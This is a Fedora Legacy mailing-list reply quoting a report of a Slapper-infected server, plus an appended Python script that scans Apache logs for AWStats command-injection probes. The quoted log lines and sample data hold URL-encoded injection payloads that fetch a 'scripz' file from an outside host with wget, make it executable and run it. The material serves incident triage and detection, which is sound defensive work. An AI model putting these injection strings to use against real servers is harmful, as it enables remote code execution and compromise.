Hi James,

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Michael Mansour wrote:
> > Hi guys,
> >
> > I have an FC1 machine which got infected twice with the slapper worm, and then
> > started DOS attacking a large vendor.
> >
> > I've stopped slapper in its tracks with a couple of changes to FC1, but in
> > analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache
> > SSL server which I've now turned off), I see the following bit of interest in
> > my apache access_log:
> >
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> > HTTP/1.1"
> > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> > HTTP/1.1"
> > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> >
> > These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> > to "httpd" and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to fix/block slapper
> > from an FC1 machine?
> >
> > Michael.
> >
>
> Michael,
>
> Try my version of httpd here:
> http://support.intcomgrp.com/~jkosin
>
> It has been effective against the worm so far.

Thanks, I will actually try them out today.

Have you considered making a yum/apt repo for your packages? It'll make it much easier to yum to newer releases when you have them, and it's quite easy to make a yum/apt repo.

Michael.

--
fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
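
When triaging an access log like the one quoted in this thread, it helps to URL-decode the `configdir` parameter of every `awstats.pl` request and record the response status, since the two quoted requests were answered with 403 and 404. The Python below is an added example, not part of the original messages; the function name, the sample log lines and the documentation-range addresses in them are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"\S+ (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Shell metacharacters that have no place in an awstats configdir value.
SHELL_META = re.compile(r'[|;`$&<>]')

def find_awstats_probes(lines):
    """Return one dict per awstats.pl request whose decoded configdir holds shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.lower().endswith("awstats.pl"):
            continue
        for param in query.split("&"):
            name, _, raw = param.partition("=")
            value = unquote(raw)  # decode %7C, %3b, ... before matching
            if name.lower() == "configdir" and SHELL_META.search(value):
                status = int(m.group("status"))
                hits.append({
                    "host": m.group("host"), "time": m.group("time"),
                    "path": path, "status": status,
                    # 2xx: the CGI was served and needs follow-up; 403/404: refused
                    "served": 200 <= status < 300,
                    "decoded": value,
                })
    return hits

# Constructed sample log lines (assumed values, modelled on the format quoted above).
SAMPLE = [
    '192.0.2.44 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0"',
    '192.0.2.50 - - [23/Jan/2006:08:40:10 +1100] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [23/Jan/2006:09:00:00 +1100] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [23/Jan/2006:09:00:05 +1100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_awstats_probes(SAMPLE):
        verdict = "SERVED, investigate" if hit["served"] else "refused"
        print(hit["host"], hit["status"], verdict, hit["path"], repr(hit["decoded"]))
```

Entries reported as served are the ones to correlate with new files in /tmp and unexpected processes; refused entries point to looking for another entry path.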